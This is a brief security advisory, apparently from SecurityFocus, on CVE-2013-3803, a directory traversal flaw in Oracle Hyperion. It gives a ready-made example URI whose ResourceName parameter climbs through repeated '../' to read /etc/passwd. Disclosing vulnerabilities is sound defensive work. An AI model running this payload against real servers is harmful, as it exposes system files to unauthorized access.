Oracle Hyperion CVE-2013-3803 Directory Traversal Vulnerability

Attackers can exploit this issues through a browser.

The following example URI is available:

http://www.example.com/raframework/ihtml/GetResource?DocUUID=00000122ad09cf47-0000-d521-0aeaf211&DocInstanceID=1&ResourceName=../../../../../../../../../../../../../../../../etc/passwd


 

Privacy Statement
Copyright 2010, SecurityFocus